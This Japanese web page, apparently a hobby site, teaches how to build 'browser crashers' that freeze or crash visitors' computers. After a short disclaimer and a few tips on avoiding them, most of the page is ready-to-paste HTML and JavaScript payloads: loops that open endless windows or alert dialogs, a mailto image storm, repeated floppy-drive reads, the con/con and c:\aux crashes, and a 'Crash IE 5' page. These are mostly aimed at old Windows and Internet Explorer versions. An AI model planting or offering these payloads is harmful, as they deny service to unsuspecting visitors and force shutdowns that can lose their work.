ブラウザクラッシャー

 

ここではいくつかのブラウザクラッシャーの作成方法を紹介しますが、
決して作成したブラクラを
悪用しないでください。

ブラクラから身を守るためには?
@
JAVAスクリプトを切るのが有効です。
Aページに飛ぶ前にソースを調べて事前に防ぐ方法として、メモ帳やTerapadを利用します。(Terapadの方が見やすく表示されます。)
メモ帳(Terapad)を起動し、開くを押します。ファイル名にそのページのURLを貼り付ければ、ネットワークを通じてソースが表示されます。
BアクセスしたいURLの前に「view-source:」を追加してアクセスすることで、防ぐ方法もあります。

上記の方法でブラクラから身を守りましょうー。


windowがどんどん出てくる。

 windowがどんどん開いてしまいます。
 例えば「123」という名前の800×600のサイズの新しいウィンドウを出す方法は
 <HEAD>〜</HEAD>の間に
 
 <SCRIPT LANGUAGE="JavaScript">
 function WindowOpen(){
 open("abc.htm","window1","toolbar=no,hight=600,width=800");
 }
 他にも

 <SCRIPT LANGUAGE="JavaScript">
 <!--
 for (i=0; i<100; ++i) {
 window.open();
 }
 -->
 </SCRIPT>

 で100個のウィンドウが開いて、PCがリソース不足となってフリーズしてしまう。
 いくら出てきた窓を閉じていっても永久に開き続けるので
 脱出するには強制終了しかない。


mailtoストーム

メールを次々に沢山起動してしまうもので、
PCをフリーズさせてしまおうというものです。

 <BODY>〜</BODY>の間に
 
 <IMG SRC="mailto:1">
 
 と書くだけで、メッセージの作成が出てきます。 沢山出す方法は

 <IMG SRC="mailto:1">
 <IMG SRC="mailto:2">
 <IMG SRC="mailto:3">
     ・
     ・
 <IMG SRC="mailto:10">

 のように数字を連番で取ればOKです。



FDアタック

 ページを開くとフロッピーディスクにアクセスし続けるというソースを紹介します。
 これも沢山書くとフロッピーディスクドライブに延々とアクセスし続けます。
 
 <BODY>〜</BODY>の間に

 <IMG SRC="a:\1.jpg">
 <IMG SRC="a:\2.jpg">
 <IMG SRC="a:\3.jpg">
 <IMG SRC="a:\4.jpg">
     ・
     ・
 <IMG SRC="a:\100.jpg">

 と書くとフロッピーディスクに 1.jpg 〜 100.jpg というファイルを探しに行きますから、フロッピーディスクが
 延々と回り続けます。


CONCONクラッシャー

 Windows95/98で、IEのバージョンが5.01までならfile:///c|/con/conなど存在しないファイルにアクセスすると、
 Windowsがcrashするというものです。 WindowsNT/2000/XPでは何も起こりません。

 <BODY>〜</BODY>の間に

 <IMG SRC="file:///c|/con/con">

 と書き込むだけで、そのページに入ったとたんに強制終了画面になります。


CPUの使用率が100%

 Windows NT/2000版のInternet Explorer 5.0(IE5)をターゲットにした「Crash IE 5」です。

 <html>
 <body bgcolor="steelblue">
 <form>
 <input type="button" value="Crash IE 5"
 onclick="document.body.style.display='none'" style="position: absolute;
 left: 40%; top: 50%; background: #777777;">
 </form>
 </body>
 </html>

 このHTMLページを読み込むと「Crash IE 5」というボタンが一つ配置されます。
 それを押すとCPUの使用率が100%になってしまい、強制終了しかないようです。


ファイルを開き続ける

 ページを開くと、ファイルをどんどん開いていきます。
 HPの中の<body>を下のように書くだけで、無限ループに入りフリーズします。

 <body onload="var i=0;while(1){open('./',i++);}">


アラート(警告窓)が開き続ける

 警告のダイアログが開き、閉じても閉じても出てくる。
 ダイアログが出ている間は他のことが何も出来ないです。
 <HEAD>〜</HEAD>の間に

 <SCRIPT LANGUAGE="JavaScript">
 for ( ; ; ) {
 window.alert("閉じれるかな?ヽ( ´ー`)ノ ")
 }
 </SCRIPT>

 と書けばでダイアログを開き続けます。
 強制終了しましょう。



IE6をフリーズさせる

 Internet Explorer 6(IE6)のアドレスバーに「c:\aux」と入力して実行するとIE6がフリーズする。
 詳しく説明すると
特定のディレクトリにアクセスするとOSごとクラッシュしてしまうバグ。CONCONバグに似ています。

 対処方法は強制終了で。


TOP

inserted by FC2 system